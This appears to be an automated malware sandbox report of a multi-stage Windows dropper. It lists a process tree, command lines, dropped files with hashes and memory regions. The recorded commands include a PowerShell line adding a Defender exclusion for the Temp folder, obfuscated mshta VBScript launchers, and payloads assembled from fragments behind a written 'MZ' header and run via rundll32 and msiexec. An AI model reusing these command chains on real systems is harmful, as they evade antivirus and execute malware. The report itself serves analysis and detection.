PID 4604 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\msiexec.exe
PID 4604 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4604 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2320 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe
PID 3232 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe
PID 4156 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe

Processes

C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe

"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe

Fri2050293ea5.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe

Fri2002ce5f91c761.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe

Fri20109b9e174d0fc.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe

Fri20ba391d4469.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe

Fri20ee0a6fe195bd09.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe

Fri209f6924af86d795.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe

Fri20d5530575e8aa3ed.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe

Fri208f5f140853548.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe

Fri20e095683c2b3a0c.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe

Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe

Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe

Fri2060ea1c5d8fae8aa.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4604 -ip 4604

C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$50278,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 612

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe

"C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp

"C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$20266,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "" == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 620

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /IM "Fri20ba391d4469.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Fri208f5f140853548.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell"). RUN ( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" " , 0 , true ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4212 -ip 4212

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 640

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 " == "" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 660

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct ( "WscRiPt.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4212 -ip 4212

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 780

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\msiexec.exe

msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 784

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffec215cc40,0x7ffec215cc4c,0x7ffec215cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1924 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2072,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2056 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2256 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri200ae385720d3.exe

Fri200ae385720d3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 640

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4060 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1124

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4212 -ip 4212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 1400

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5104,i,5135473508473110230,15839935129779680270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5116 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network


Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libstdc++-6.dll

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libcurl.dll

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkqk0uvo.yhe.ps1

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209c4b463b.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe

MD5 39fbed3967544cc6a59e1d1152cdcc35
SHA1 b9e974a506f3be7fc78574ae008e7686093eb82d
SHA256 cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6
SHA512 cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe

MD5 85ef31a707d583032b8526d16e8883a8
SHA1 16beed53fc46bf75cf4081d73dc843f4d8298569
SHA256 bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409
SHA512 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe

MD5 1902e1df4ecf3bf7bcfc0c53b992cd24
SHA1 a0c9cde0b2113466a820fa6ebcccfdcd93b26b97
SHA256 c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720
SHA512 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe

MD5 7d44a083f0e81baf1ecb264b93bdc9a5
SHA1 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce
SHA256 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5
SHA512 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri200ae385720d3.exe

MD5 8aaec68031b771b85d39f2a00030a906
SHA1 7510acf95f3f5e1115a8a29142e4bdca364f971f
SHA256 dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b
SHA512 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe

MD5 06ee576f9fdc477c6a91f27e56339792
SHA1 4302b67c8546d128f3e0ab830df53652f36f4bb0
SHA256 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8
SHA512 e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe

MD5 37a1c118196892aa451573a142ea05d5
SHA1 4144c1a571a585fef847da516be8d89da4c8771e
SHA256 a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a
SHA512 aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db

memory/4900-103-0x00000000061F0000-0x000000000623C000-memory.dmp

memory/4900-102-0x00000000061A0000-0x00000000061BE000-memory.dmp

memory/4604-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4604-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4604-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4604-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/4604-66-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2672-135-0x0000000000E60000-0x0000000000E68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2776-145-0x0000000004B70000-0x0000000004BE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-LFQQP.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2776-155-0x0000000004B50000-0x0000000004B6E000-memory.dmp

memory/2776-144-0x0000000000470000-0x00000000004E2000-memory.dmp

memory/3636-141-0x0000000002330000-0x0000000002336000-memory.dmp

memory/3636-132-0x00000000001E0000-0x00000000001F8000-memory.dmp

memory/208-130-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2776-156-0x00000000053C0000-0x0000000005964000-memory.dmp

memory/1084-161-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4256-167-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/208-168-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4900-180-0x0000000006790000-0x00000000067AE000-memory.dmp

memory/4952-183-0x0000000003710000-0x0000000003732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PATC0.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4900-182-0x0000000007440000-0x00000000074E3000-memory.dmp

memory/4952-181-0x0000000003480000-0x00000000034A4000-memory.dmp

memory/4900-170-0x00000000704D0000-0x000000007051C000-memory.dmp

memory/4900-169-0x0000000006750000-0x0000000006782000-memory.dmp

